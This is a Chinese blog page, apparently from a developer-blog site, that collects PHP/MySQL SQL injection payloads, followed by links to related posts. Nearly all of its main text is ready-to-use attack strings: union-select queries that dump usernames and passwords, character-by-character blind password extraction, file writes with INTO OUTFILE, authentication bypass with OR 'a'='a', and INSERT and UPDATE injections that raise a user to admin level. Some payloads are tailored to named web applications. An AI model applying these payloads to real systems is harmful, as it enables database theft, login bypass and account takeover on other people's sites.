php怎么注入,php注入方法集锦

最新推荐文章于 2022-02-26 22:13:21 发布
最新推荐文章于 2022-02-26 22:13:21 发布
阅读量521 收藏
点赞数
文章标签: php怎么注入

'%23

' and passWord='mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)

' and LENGTH(password)='6(探测密码长度)

' and LEFT(password,1)='m

' and LEFT(password,2)='my

…………………………依次类推

' union select 1,username,password from user/*

' union select 1,username,password from user/*

=' union select 1,username,password from user/* (可以是1或者=后直接跟)

99999' union select 1,username,password from user/*

' into outfile 'c:/file.txt (导出文件)

=' or 1=1 into outfile 'c:/file.txt

1' union select 1,username,password from user into outfile 'c:/user.txt

select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'

id=' union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() (灵活应用查询)

常用查询测试语句,

select * FROM table where 1=1

select * FROM table where 'uuu'='uuu'

select * FROM table where 1<>2

select * FROM table where 3>2

select * FROM table where 2<3

select * FROM table where 1

select * FROM table where 1+1

select * FROM table where 1--1

select * FROM table where ISNULL(NULL)

select * FROM table where ISNULL(COT(0))

select * FROM table where 1 IS NOT NULL

select * FROM table where NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where 'b' BETWEEN 'a' AND 'c'

select * FROM table where 2 IN (0,1,2)

select * FROM table where CASE WHEN 1>0 THEN 1 END

例如:夜猫下载系统1.0版本

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

…………………………………………………………

例如2:灰色轨迹 变换id进行测试(meteor)

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

构造语句:

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)

union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate

union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate

union %20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username ='sandflee')%20order%20by%20eventdate (查沙子的id)

(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)

select * FROM article where articleid='$id' union select * FROM……(字段和

数据库相同情况下,可直接提交)  select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM……(不同的情况下)  特殊技巧:在表单,搜索引擎等地方写:  "___"  ".__ "  "%  %' ORDER BY articleid/*  %' ORDER BY articleid#  __' ORDER BY articleid/*  __' ORDER BY articleid#  $command = "dir c:/";system($command);  select * FROM article where articleid='$id'  select * FROM article where articleid=$id  1' and 1=2 union select * from user where userid=1/* 句中变为  (select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*')  1 and 1=2 union select * from user where userid=1  语句形式:建立一个库,插入:  create DATABASE `injection`  create TABLE `user` (  `userid` int(11) NOT NULL auto_increment,  `username` varchar(20) NOT NULL default '',  `password` varchar(20) NOT NULL default '',  PRIMARY KEY (`userid`)  ) ;  insert INTO `user` VALUES (1, 'swap', 'mypass');  插如一个注册用户:  insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');  "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";  insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')  "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";  insert INTO membres SET login='',password='',nom='',userlevel='3',email=''  "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";  update user SET password='$password', homepage='$homepage' where id='$id'  update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'  "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";  update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'  "update news SET Votes=Votes+1, score=score+$note where idnews='$id'";  长用函数:  DATABASE()  USER()  SYSTEM_USER()  SESSION_USER()  CURRENT_USER()  比如:  update article SET title=$title where articleid=1 对应函数  update article SET title=DATABASE() where id=1  #把当前数据库名更新到title字段  update article SET title=USER() where id=1  #把当前 mysql 用户名更新到title字段  update article SET title=SYSTEM_USER() where id=1  #把当前 MySQL 用户名更新到title字段  update article SET title=SESSION_USER() where id=1  #把当前 MySQL 用户名更新到title字段  update article SET title=CURRENT_USER() where id=1  #把当前会话被验证匹配的用户名更新到title字段  :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  $req = "select * FROM membres where name like '%$search%' ORDER BY name";  select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name  select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name  select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' (经典)  select uid FROM admins where login='' OR admin_level=1#' AND password=''  select * FROM table where msg like '%hop'  select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''  select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name

无情欧拉少
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP Object Injection(PHP对象注入
Bendawang's Blog
03-18 4777
PHP Object Injection(PHP对象注入
php注入!
CNssy Blog
12-31 931
Php注入攻击是现今最流行的攻击方式,依靠它强大的灵活性吸引了广大黑迷。 在上一期的《php安全与注射专题》中林.linx主要讲述了php程序的各种漏洞,也讲到了php+mysql注入的问题,可是讲的注入的问题比较少,让我们感觉没有尽兴是吧. OK,这一期我将给大家伙仔仔细细的吹一吹php+mysql注入,一定让你满载而归哦(谁扔砖头哩!)。 本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能
php注入方法集锦
phphot
03-07 2393
%23  and passWord=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from 
php注射库
FreeXploiT
10-24 1303
php注射库作者:swap类别:漏洞资料库发布日期:2004-06-28 14:45:43总浏览:46 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(9
php注入方法,PHP语言之php注入方法集锦
weixin_31431507的博客
03-12 260
本文主要向大家介绍了PHP语言之php注入方法集锦,通过具体的内容向大家展示,希望对大家学习php语言有所帮助。''%23''andpassWord=''mypassid=-1unionselect1,1,1id=-1unionselectchar(97),char(97),char(97)id=1unionselect1,1,1frommembersid=1union...
PHP注入完整教程
hyshucom
06-09 262
在这个注入风靡的时代,多少菜鸟拿着工具四处冲锋.如果你不想成为工具的奴隶,不想遇到PHP就退避三舍,不想继续做着ASP的菜鸟之群,不 想......那么请你静下心来, 随我一同走完这次的入侵检测全过程.相信你必然能有所收获.不只在技术上,更在思路上,更在意识上..   判断是否存在注入:首先,PHP和ASP判断注入方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即...
php防止sql注入方法详解
12-18
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入数据的漏洞。当攻击者在表单字段中插入恶意的SQL语句片段时,这些非法...通过这些方法,开发者可以大大降低PHP应用遭受SQL注入攻击的风险。
PHP简单预防sql注入方法
12-18
以下是一些PHP防止SQL注入方法: 1. 使用参数化查询: 参数化查询是防止SQL注入的最有效方式之一。在PHP中,PDO (PHP Data Objects) 扩展提供了预处理语句,可以有效地避免SQL注入。例如: ```php $stmt = $pdo-...
PHP+MYSQL 注入靶场
最新发布
04-26
**PHP+MYSQL 注入靶场**是一个用于学习和实践**SQL注入**的平台,它包含相关的源代码,有助于用户深入理解漏洞的原理。通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述...
PHP注入
VioletKiss
05-10 700
1.输入正确地址 在地址栏输入地址且在问号处加上id=1 2.探测是否有注入漏洞 在地址栏后加入and 1=1 或者1=2,若页面无异常,表示存在注入 3.确定MySQL的版本 在地址后加上 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询 4.判断数据库连接账号有没有写权限
PHP注入工具
07-17
PHP注入工具 注入地址,检测注入 网站地址浏览
php中的数种依赖注入
weixin_34356555的博客
10-13 142
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP代码注入
zl52111的博客
04-16 1503
1.大致介绍: PHP代码执行注入(web方面)是指应用程序过滤不严格,用户可以通过请求将代码注入到应用中执行。代码执行类似于SQL注入漏洞。代码执行是可以把代码注入到应用中最终由服务器运行它,这样的漏洞如果没有特殊的过滤,相当于直接有了一个web后门的存在。 2.漏洞的危害: 可以通过代码执行漏洞继承web用户权限,执行任意代码。如果具有服务器没有正确配置,用户权限比较高的话,我们可以读写目标服务器的任意文件内容,甚至控制整个网站以及服务器。PHP中有很多函数和语句都会造成PHP 代码执行漏洞。 3.
PHP注入01】PHP语言常见可注入函数(eval、assert、preg_replace、call_user_func、$a($b)等)
Fighting_hawk的博客
02-26 4003
1. 掌握PHP语言种几种可能存在注入的函数; 2. 结合SQL注入与XSS漏洞思考PHP注入绕过手法。
PHP命令注入***
weixin_33730836的博客
06-27 1011
PHP命令注入***漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。本文描述了常见的PHP命令注入***漏洞存在形式和利用方法,结合漏洞实例进行分析和漏洞利用,并针对如何防范PHP命令注入***漏洞给出了可行的方法和建议。Command Injection,即命令注入***,是指由于Web应用程序对用户...
PHP 的对象注入
Fly_鹏程万里
09-17 1377
在理解对象注入之前要知道的一些东西。 PHP中的序列化 在说序列化之前,我记得以前有过这样一个疑问:为什么需要序列化? 后来我在网上搜到了这样一个回答很好的解决了我的疑问。 “你有一个应用程序,需要传一些数据给其它应用程序,但数据保存在你的进程的堆栈中,其它进程无法访问你的应用程序进程的堆栈,要想把你的程序的数据给其它程序使用,必须将数据以某种形式传给其它进程,这个‘某种形式’就是序列化 ...
php注入代码,PHP依赖注入(代码全篇)
weixin_42392689的博客
03-09 179
依赖注入传统的思路应用程序用到一个Foo类,就会创建Foo类并调用Foo类的方法。假如这个方法内需要一个Bar类,就会创建Bar类并调用Bar类的方法。而这个方法内需要一个Bim类,就会创建Bim类,接着做些其它工作。/*** Foo*/class Foo{public function doSomething($value=''){# code...$Bar = new Bar();$Bar-...
php注入十点基本步骤
leanov的专栏
03-21 344
<br /><br />来源:Neeao<br />1.判断是否存在注入,加’;and 1=1;and 1=2<br />2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询<br />3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10<br />4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,……./*直到返回正常,说明猜到准
php注入过程详解,php注入详解
weixin_42524013的博客
03-23 340
本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦。阅读此文你只要明白下面的这点东西就够了。1.明白php+mysql环境是如何搭建的,在光盘中我们收录搭建的相关文章,如果您对搭建php+mysql环境不是很清楚,请先查阅此文,在上一期的专题中也有所介绍。2.大概了解php和apache的配置,主要用到php.ini和httpd...
PHP注入防护策略与安全设置
以下是一些防范PHP注入方法: 1. **启用Magic Quotes GPC**:`magic_quotes_gpc`是PHP的一个配置选项,它可以自动对用户输入的数据进行转义,从而防止SQL注入。不过,这个选项在PHP 5.4之后已被废弃,因为它的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值